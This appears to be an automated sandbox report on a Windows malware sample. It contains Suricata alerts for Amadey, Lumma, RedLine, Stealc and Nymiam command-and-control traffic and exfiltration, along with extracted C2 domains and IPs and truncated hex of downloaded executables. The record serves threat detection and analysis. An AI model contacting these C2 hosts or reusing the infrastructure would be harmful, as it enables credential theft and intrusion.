Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49854 version: TLS 1.2

Source:	Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.1553984924.00000259EF0A5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdbl source: powershell.exe, 00000009.00000002.1553984924.00000259EF0A5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 6?ll\System.pdb source: powershell.exe, 00000009.00000002.1553984924.00000259EF0A5000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D3DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00D3DBBE
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D0C2A2 FindFirstFileExW,	0_2_00D0C2A2
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D468EE FindFirstFileW,FindClose,	0_2_00D468EE
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D4698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00D4698F
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D3D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00D3D076
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D3D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00D3D3A9
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D49642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D49642
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D4979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D4979D
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D49B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00D49B2B
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D45C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00D45C97

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 178MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49711 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.8:49716 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49712
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49718 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.2.8:54349 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.8:49720 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.8:49723 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49721 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.8:49725 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.8:49726 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.8:49724 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.8:49724 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49727 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.8:49731 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.8:49735 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49732 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 103.84.89.222:33791 -> 192.168.2.8:49724
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.8:49724 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49739 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.8:49741 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49737 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.8:49743 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49744 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49753 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz) : 192.168.2.8:52348 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.8:49761 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.8:49763 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49762 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 103.84.89.222:33791 -> 192.168.2.8:49724
Source: Network traffic	Suricata IDS: 1800002 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Key Request : 192.168.2.8:49767 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800003 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Download Request : 192.168.2.8:49767 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.8:49772 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49767 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49775 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.8:49783 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.8:49771 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.8:49785 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49787 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.8:49789 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49792 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.8:49793 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.8:49799 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49797 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49802 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49807 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49809 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49814 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49840 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49845 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49855 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49858 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 1800005 - Severity 1 - Joe Security MALWARE Nymiam - C&C Software Download Request : 192.168.2.8:49864 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800005 - Severity 1 - Joe Security MALWARE Nymiam - C&C Software Download Request : 192.168.2.8:49866 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.8:49780 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49861 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49862 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49920
Source: Network traffic	Suricata IDS: 1800002 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Key Request : 192.168.2.8:56482 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800003 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Download Request : 192.168.2.8:56482 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:56482 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49723 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49723 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49720 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49720 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49725 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49728 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49728 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49743 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49747 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49747 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49772 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49788 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49803 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49828 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49854 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49805 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49805 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49804 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49804 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49763 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49763 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49761 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49761 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.8:49852 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49799 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.115/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: paleboreei.biz
Source: Malware configuration extractor	URLs: importenptoc.com
Source: Malware configuration extractor	URLs: voicesharped.com
Source: Malware configuration extractor	URLs: inputrreparnt.com
Source: Malware configuration extractor	URLs: torpdidebar.com
Source: Malware configuration extractor	URLs: rebeldettern.com
Source: Malware configuration extractor	URLs: actiothreaz.com
Source: Malware configuration extractor	URLs: garulouscuto.com
Source: Malware configuration extractor	URLs: breedertremnd.com
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	URLs: 103.84.89.222:33791

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49785

Source: global traffic

TCP traffic: 192.168.2.8:49724 -> 103.84.89.222:33791

Source: global traffic

TCP traffic: 192.168.2.8:56473 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:57:53 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:59:07 GMTContent-Type: application/octet-streamContent-Length: 6088704Last-Modified: Fri, 07 Feb 2025 15:27:20 GMTConnection: keep-aliveETag: "67a62658-5ce800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 40 01 00 00 00 00 00 00 b0 87 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 87 00 00 04 00 00 06 36 5d 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b 80 41 00 6f 00 00 00 00 d0 40 00 a0 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 87 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 40 00 00 10 00 00 00 c0 40 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a0 ae 00 00 00 d0 40 00 00 70 00 00 00 d0 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 41 00 00 02 00 00 00 40 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 90 41 00 00 02 00 00 00 42 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 64 67 64 64 78 6d 68 00 80 1b 00 00 20 6c 00 00 7e 1b 00 00 44 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6c 78 63 7a 69 61 77 00 10 00 00 00 a0 87 00 00 04 00 00 00 c2 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 87 00 00 22 00 00 00 c6 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
